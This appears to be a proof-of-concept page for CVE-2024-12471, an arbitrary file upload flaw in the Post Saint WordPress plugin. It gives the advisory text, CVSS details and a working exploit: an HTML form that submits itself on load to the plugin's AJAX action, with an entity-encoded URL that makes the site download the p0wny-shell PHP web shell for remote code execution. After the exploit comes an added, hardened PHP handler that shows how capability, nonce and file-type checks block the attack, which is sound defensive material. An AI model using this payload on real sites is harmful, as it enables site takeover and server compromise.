
CVE-2024-12471 PoC — Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload

Associated Vulnerability
Title: Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload (CVE-2024-12471)
Description: The Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check and missing file type validation on the add_image_to_library AJAX action function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible.
Readme
# CVE-2024-12471
Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload

# Description

The Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check and missing file type validation on the add_image_to_library AJAX action function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible.

## Details

- **Type**: plugin
- **Slug**: post-saint
- **Affected Version**: 1.3.1
- **CVSS Score**: 8.8
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-12471
- **Status**: Closed

## POC

```html
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="add&#95;image&#95;to&#95;library" />
      <input type="hidden" name="image&#95;url" value="https&#58;&#47;&#47;raw&#46;githubusercontent&#46;com&#47;flozz&#47;p0wny&#45;shell&#47;refs&#47;heads&#47;master&#47;shell&#46;php" />
      <input type="hidden" name="image&#95;prompt" value="say&#32;hello" />
      <input type="hidden" name="insert&#95;prompt&#95;media&#95;library&#95;fields" value="caption&#95;description" />
      <input type="hidden" name="image&#95;generator" value="pexels" />
      <input type="hidden" name="log&#95;id" value="1667" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
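The advisory attributes the issue to two missing controls on the `add_image_to_library` AJAX handler: no capability check and no file type validation. The handler below is an added example, not code from the Post Saint plugin, showing what a hardened version of such an action looks like in WordPress. The hook name and the `image_url` POST field follow the advisory and the PoC form above; the function name, the nonce action `post_saint_add_image`, the `nonce` request field and the image allow-list are assumptions.

```php
<?php
/**
 * Added example (not the plugin's own code): a hardened "add_image_to_library"
 * AJAX action. It refuses the request before anything is downloaded unless the
 * caller has the upload_files capability, and it accepts only files whose bytes
 * are really an image, regardless of what the URL or filename claims.
 */

// Authenticated users only: no 'wp_ajax_nopriv_' counterpart is registered.
add_action( 'wp_ajax_add_image_to_library', 'hardened_add_image_to_library' );

function hardened_add_image_to_library() {
    // 1. CSRF protection. Nonce action name and request field are assumptions;
    //    the calling JS must send wp_create_nonce( 'post_saint_add_image' ).
    check_ajax_referer( 'post_saint_add_image', 'nonce' );

    // 2. Capability check: the root cause named in the advisory. Subscribers do
    //    not have 'upload_files', so they are rejected here.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    $image_url = isset( $_POST['image_url'] ) ? esc_url_raw( wp_unslash( $_POST['image_url'] ) ) : '';
    if ( '' === $image_url || ! wp_http_validate_url( $image_url ) ) {
        wp_send_json_error( array( 'message' => 'Invalid image URL.' ), 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/media.php';
    require_once ABSPATH . 'wp-admin/includes/image.php';

    // 3. Fetch to a temp file first; validation happens on the downloaded bytes.
    $tmp = download_url( $image_url, 15 );
    if ( is_wp_error( $tmp ) ) {
        wp_send_json_error( array( 'message' => 'Download failed.' ), 502 );
    }

    // Explicit allow-list of image types (an assumption for this example).
    $allowed_mimes = array(
        'jpg|jpeg|jpe' => 'image/jpeg',
        'png'          => 'image/png',
        'gif'          => 'image/gif',
        'webp'         => 'image/webp',
    );
    $filename = sanitize_file_name( basename( (string) wp_parse_url( $image_url, PHP_URL_PATH ) ) );

    // wp_check_filetype_and_ext() matches the name against the allow-list and
    // then checks the real content; 'ext' and 'type' come back empty when
    // either the name (e.g. shell.php) or the bytes are not an allowed image.
    $check = wp_check_filetype_and_ext( $tmp, $filename, $allowed_mimes );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        @unlink( $tmp );
        wp_send_json_error( array( 'message' => 'Only image files are accepted.' ), 415 );
    }

    // 4. Hand the validated file to the media library. 'proper_filename' is set
    //    when WordPress corrected the extension to match the detected type.
    $file_array = array(
        'name'     => ! empty( $check['proper_filename'] ) ? $check['proper_filename'] : $filename,
        'tmp_name' => $tmp,
    );
    $attachment_id = media_handle_sideload( $file_array, 0 );
    if ( is_wp_error( $attachment_id ) ) {
        @unlink( $tmp );
        wp_send_json_error( array( 'message' => $attachment_id->get_error_message() ), 500 );
    }

    wp_send_json_success( array( 'attachment_id' => $attachment_id ) );
}
```

Each `wp_send_json_error()` call terminates the request, so the download and media-library steps are never reached for a caller who fails the nonce or capability checks. Against the PoC above, the request is stopped at step 2 for a subscriber; even for a user who does hold `upload_files`, a URL ending in `.php` fails the allow-list at step 3 because `wp_check_filetype_and_ext()` returns no extension or type for it.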
File Snapshot

```
[4.0K] /data/pocs/68092965a4f4e51d356020e68c12eaebb9e1143b
└── [1.8K] README.md

0 directories, 1 file
```